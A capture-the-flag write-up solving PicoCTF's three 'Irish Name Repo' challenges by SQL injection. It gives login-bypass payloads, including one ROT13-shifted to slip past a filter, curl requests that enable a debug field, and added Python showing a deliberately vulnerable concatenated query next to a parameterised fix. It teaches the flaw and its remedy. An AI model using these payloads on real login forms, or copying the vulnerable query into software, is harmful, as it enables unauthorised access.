CTF – Irish-Name-Repo 1-3
We’re going to look at the 3 ‘Irish Name Repo’ hacking challenges supplied by PicoCTF. All three challenges are broken down below, so you can see how the solution develops.
Irish Name Repo 1
This is a 300 point Web Exploitation hacking challenge.
This is what we’re provided with:
AUTHOR: CHRIS HENSLER
Description
There is a website running at
https://jupiter.challenges.picoctf.org/problem/33850/
(link) or http://jupiter.challenges.picoctf.org:33850. Do you think you can log us in? Try to see if you can login!
PicoCTF challenge info
If you navigate to the site and then over to the ‘Support’ section, you realise two things: firstly, the site administrator has the username ‘Admin’, and secondly, a user is complaining that they’re having difficulty adding a name. That name happens to include a single quote… a telltale sign that SQL injection may be possible.
Hi. I tried adding my favorite Irish person, Conan O’Brien. But I keep getting something called a SQL Error
Possible attack vector – SQL injection with single quotes not being handled properly…
If we head over to the login page, we can try a few simple ideas with the username ‘Admin’ as an educated guess.
Using a single quote in the password sure does look bad… the site breaks.
So the challenge site appears to be susceptible to injection through unescaped single quotes. Submitting the following payload returns the flag:
Username: admin
Password: ' or 1 --
Irish Name Repo 2
This is a 350 point Web Exploitation hacking challenge.
This is what we’re provided with:
AUTHOR: XINGYANG PAN
Description
There is a website running at https://jupiter.challenges.picoctf.org/problem/64649/ (link) or http://jupiter.challenges.picoctf.org:64649.
Someone has bypassed the login before, and now it’s being strengthened. Try to see if you can still login!
PicoCTF challenge info
Okay, so what’s the difference between this and the first Irish Name Repo challenge?
Well if we use the payload from the first challenge, we’re presented with:
Tweaking the password payload, we can see that ' OR 1=1 ' is what causes us to be detected. Trimming it even further, the OR operator alone triggers the detection.
The single hint on this hacking challenge is that the parameters are being filtered. We already knew that.
Taking a look at the HTML source code, we can see a hidden field called debug, with a value of 0. Bingo.
It may be easier to jump over to CURL now:
curl 'https://jupiter.challenges.picoctf.org/problem/64649/login.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: https://jupiter.challenges.picoctf.org' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: https://jupiter.challenges.picoctf.org/problem/64649/login.html' -H 'Cookie: PHPSESSID=d9jfl0mhsvfk6ib40etlue6ofl' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'username=admin&password=%27+or+1%3D1+--&debug=1'
Firing off that request, with the debug value now set to 1, we get the following response:
<pre>username: Admin
password: ' or 1=1 --
SQL query: SELECT * FROM users WHERE name='admin' AND password='' or 1=1 --'
</pre><h1>SQLi detected.</h1>
Excellent info.
We can see that within the SQL query, the first condition is against the name attribute. Knowing this, we can inject into that attribute and turn the rest of the query into an ignorable comment.
With that info we can use the following payload to reveal the flag:
Username: admin'--
Password: (blank)
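To see why both the Repo 1 and Repo 2 payloads work, why a keyword filter like the one that reports ‘SQLi detected’ is the wrong fix, and what the right fix looks like, here is an added Python example. It is not code from the challenge or from this writeup: the in-memory SQLite table, the admin row and the blacklist regex are all constructed here, and only the query shape is taken from the debug output above.

```python
import re
import sqlite3

# Constructed stand-in for the challenge's users table; the real schema and
# credentials are not known, only the query shape the debug output revealed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Builds the statement by string concatenation, the shape shown in the
    debug output: SELECT * FROM users WHERE name='...' AND password='...'.
    Returns (logged_in, rendered_sql) so the rendered statement can be inspected."""
    sql = (f"SELECT * FROM users WHERE name='{username}' "
           f"AND password='{password}'")
    return conn.execute(sql).fetchone() is not None, sql


# Constructed keyword blacklist standing in for the challenge's unknown filter,
# which the writeup found to trigger on the OR operator.
_BLACKLIST = re.compile(r"\bor\b|\bunion\b", re.IGNORECASE)


def naive_filter_blocks(value):
    """True if the blacklist would reject this input ('SQLi detected')."""
    return _BLACKLIST.search(value) is not None


def safe_login(conn, username, password):
    """Parameterised query: the driver sends values separately from the statement,
    so quotes, comments and keywords in the input are never parsed as SQL.
    (A real application would also compare a password hash, not the plaintext.)"""
    row = conn.execute(
        "SELECT * FROM users WHERE name=? AND password=?", (username, password)
    ).fetchone()
    return row is not None


def demo():
    """Runs the two writeup payloads and a legitimate login through all three paths."""
    conn = make_db()
    cases = {
        "repo1": ("admin", "' or 1 --"),          # payload from Irish Name Repo 1
        "repo2": ("admin'--", ""),                # payload from Irish Name Repo 2
        "legit": ("admin", "constructed-secret"), # constructed valid credentials
    }
    results = {}
    for label, (username, password) in cases.items():
        logged_in, _ = vulnerable_login(conn, username, password)
        results[label] = {
            "vulnerable": logged_in,
            "filtered": naive_filter_blocks(username) or naive_filter_blocks(password),
            "safe": safe_login(conn, username, password),
        }
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(label, outcome)
```

Running it shows the point of the writeup in one table: the concatenated query lets both payloads in, the blacklist stops the Repo 1 password payload but not the Repo 2 username payload (no OR keyword in `admin'--`), and the parameterised query rejects both while still accepting the genuine credentials.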
Irish Name Repo 3
This is the last 400 point Web Exploitation hacking challenge of this mini series.
This is what we’re provided with:
AUTHOR: XINGYANG PAN
Description
There is a secure website running at https://jupiter.challenges.picoctf.org/problem/54253/ (link) or http://jupiter.challenges.picoctf.org:54253. Try to see if you can login as admin!
PicoCTF challenge brief
There are two changes with this hacking challenge.
Irish Name Repo 3 sees the username field dropped, as well as 301 redirects to the HTTPS version. Neither poses any issue.
We jump over to the login screen, perform a simple test login and capture it in the browser’s developer tools. We can then export it in CURL format for tweaking.
curl 'https://jupiter.challenges.picoctf.org/problem/54253/login.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: https://jupiter.challenges.picoctf.org' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: https://jupiter.challenges.picoctf.org/problem/54253/login.html' -H 'Cookie: PHPSESSID=d9jfl0mhsvfk6ib40etlue6ofl' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'password=test&debug=1'
Using a password of test obviously fails, but with the debug field set to 1 we see the following output.
<pre>password: test
SQL query: SELECT * FROM admin where password = 'grfg'
</pre><h1>Login failed.</h1>
“grfg” – that’s not what we entered as a password! Dumping in a password value of 'abcdefgh' we get the ‘encoded’ value of 'nopqrstu'. So the application is taking the parameter, encrypting it somehow, and then comparing that to the stored encrypted password in the DB.
Thankfully I recognise ROT13 encryption when I see it.
Using a ROT13 encoder, convert the simple payload from the Irish Name Repo 1 challenge from:
' OR 1=1 --
… to…
' BE 1=1 --
And that’s enough to bypass the filter and encryption.
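The reason the ROT13 step buys the application nothing is that ROT13 only moves letters; the quote, the equals sign and the comment marker come out the other side untouched. The added Python example below (mine, not the challenge’s server-side code, which is not published) rebuilds the query shape from the debug output above, shows the two encodings the writeup observed, and adds a simple defensive check on the rendered statement; the `render_query` and `looks_injected` functions are constructed for illustration.

```python
import string

# ROT13 moves only the 26 ASCII letters by 13 places; digits, quotes, spaces and
# punctuation pass through unchanged. Applying it twice restores the input.
_ROT13 = str.maketrans(
    string.ascii_uppercase + string.ascii_lowercase,
    string.ascii_uppercase[13:] + string.ascii_uppercase[:13]
    + string.ascii_lowercase[13:] + string.ascii_lowercase[:13],
)


def rot13(text):
    return text.translate(_ROT13)


def metachars_unchanged(text):
    """True if every non-letter character (quotes, '=', '-', spaces) survives ROT13
    as-is, which is why the transformation offers no protection against injection."""
    return all(rot13(ch) == ch for ch in text if not ch.isalpha())


def render_query(password):
    """Rebuilds the statement shape the challenge's debug output showed
    (illustration only; the challenge's server-side code is not known)."""
    return f"SELECT * FROM admin where password = '{rot13(password)}'"


def looks_injected(rendered_sql):
    """Defensive heuristic over the rendered statement: a single string literal
    should leave an even number of quotes and no comment marker. This is a
    detection aid only; the fix is a parameterised query, which also stops
    legitimate apostrophes (Conan O'Brien) from raising SQL errors."""
    return rendered_sql.count("'") % 2 == 1 or "--" in rendered_sql


if __name__ == "__main__":
    for pw in ("test", "abcdefgh", "' BE 1=1 --"):
        sql = render_query(pw)
        print(f"{pw!r:16} -> {sql}  injected={looks_injected(sql)}")
```

With `test` the rendered statement is the `'grfg'` line seen in the debug output; with the ROT13-shifted payload it becomes `'' OR 1=1 --'`, three quotes and a comment marker, which the heuristic flags and which the original filter never saw because it inspected the pre-ROT13 input.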
The final hacking challenge flag should be yours.